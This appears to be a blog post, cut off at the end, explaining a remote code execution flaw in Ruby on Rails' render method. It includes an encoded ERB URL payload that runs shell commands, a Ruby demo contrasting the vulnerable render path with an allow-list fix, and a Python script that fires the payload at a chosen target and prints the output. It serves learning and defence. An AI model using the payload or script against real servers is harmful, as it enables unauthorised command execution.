"Action Pack in Ruby on Rails before, 4.x before, and 4.2.x before allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method."

I realize that I'm not going to understand everything, but at times I feel like I'm nothing more than a really determined script kiddie.  That said, this seemed like something I could grasp, and when I came across the vulnerable server, I found a Metasploit module for exploiting it.  After reading through the Ruby, about Ruby, without having much experience with Ruby, I was none the wiser.

I looked for alternative exploit code in the various locations to get a better understanding but what I found were elaborate examples.  In hindsight, I'm not sure for what.  I just wanted to maybe grasp what exactly was going on without pointing Metasploit at it. 

Searching a bit more, I found a smaller proof of concept and while digging through it, I could see what was happening.  Basically, you have a URL:

http://victim/pages?id

http://victim/pages?id[inline]=%3C%25=%20%25x(INSERT COMMAND HERE)%20%25%3E

http://victim/pages?id[inline]=%3C%25=%20%25x(id)%20%25%3E

Line one is our original, line two is the encoded exploitation, and line three is asking for "id".  Our interaction is happening past: ?id

URL-decoded, the value of id[inline] is the ERB tag <%= %x(INSERT COMMAND HERE) %>.  Rails parses id[inline]=... into a nested hash, so a controller that does something like render params[:id] (the "unrestricted use of the render method" in the advisory) ends up calling render inline: "<%= %x(...) %>", and Action Pack compiles and runs that string as an ERB template on the server.  %x() executes the command in a shell and the <%= %> tag writes its output into the response body, which is why line three comes back with the uid/gid line of the account the application runs as.
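To make the server side concrete, here is an added example of mine (not code from the post, the proof of concept, Metasploit or Rails itself) that stands in for Rails' parameter parsing and render dispatch using only the Ruby standard library: parse_params nests id[inline]=... into a hash the way Rack does, vulnerable_render mimics a controller doing render params[:id], where a Hash argument is treated as render options and the inline option is evaluated as ERB, and safe_render is the fix, accepting nothing but a template name from a fixed allow-list.  The function names, the page names in ALLOWED_PAGES and the simplified bracket parsing are my assumptions.

```ruby
require "erb"
require "uri"

# Stand-in for Rack/Rails query parsing (assumption: one level of
# bracket nesting is enough here): "id[inline]=..." becomes
# {"id" => {"inline" => "..."}}.
def parse_params(query)
  params = {}
  URI.decode_www_form(query).each do |key, value|
    if key =~ /\A(\w+)\[(\w+)\]\z/
      (params[$1] ||= {})[$2] = value
    else
      params[key] = value
    end
  end
  params
end

# Models the vulnerable pattern `render params[:id]`: a Hash argument is
# taken as render options, and the inline option is an ERB template string
# that gets compiled and run on the server. Anything the attacker puts
# inside <%= %> is evaluated as Ruby, including %x() shell commands.
def vulnerable_render(arg)
  if arg.is_a?(Hash) && arg.key?("inline")
    ERB.new(arg["inline"]).result(binding)
  else
    "rendered template #{arg}"
  end
end

# Hardened form: never hand user input to render as options; only accept
# a template name that appears in a fixed allow-list (names assumed).
ALLOWED_PAGES = %w[about contact help].freeze

def safe_render(arg)
  name = arg.to_s
  raise ArgumentError, "unknown page #{name.inspect}" unless ALLOWED_PAGES.include?(name)
  "rendered template pages/#{name}"
end

if __FILE__ == $PROGRAM_NAME
  # The post's encoded payload, constructed here as the query string part
  # of http://victim/pages?id[inline]=...
  query = "id[inline]=%3C%25=%20%25x(id)%20%25%3E"
  params = parse_params(query)
  puts params.inspect               # {"id"=>{"inline"=>"<%= %x(id) %>"}}
  puts vulnerable_render(params["id"])   # output of the `id` command
  begin
    safe_render(params["id"])
  rescue ArgumentError => e
    puts "safe_render refused it: #{e.message}"
  end
end
```

Running the file shows the whole chain: the bracket key becomes a nested hash, the vulnerable path prints the uid/gid line just like the browser request does, and the allow-listed version raises instead of rendering.  The same fix in a real controller is to look the requested page up in a fixed list (or a Hash of name to template) and pass only that string to render, never params itself.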

Playing with Python, I wrote this little script to take the URL, pass "id" and parse the output to clean up all the noise in the response:

import urllib.request

# Ask for the base URL (everything up to and including ?id), append the
# id[inline] ERB payload that runs `id`, and print only the response lines
# that contain the command output so the rest of the page is not in the way.
host = input("Enter target Url eg (http://victim/pages?id) : ")
url = urllib.request.urlopen(host + "[inline]=%3C%25=%20%25x(id)%20%25%3E")
html = url.read().decode("utf-8", "replace").splitlines()
for line in html:
    if 'uid=' in line:
        print(line)

You can also work with this straight in the browser: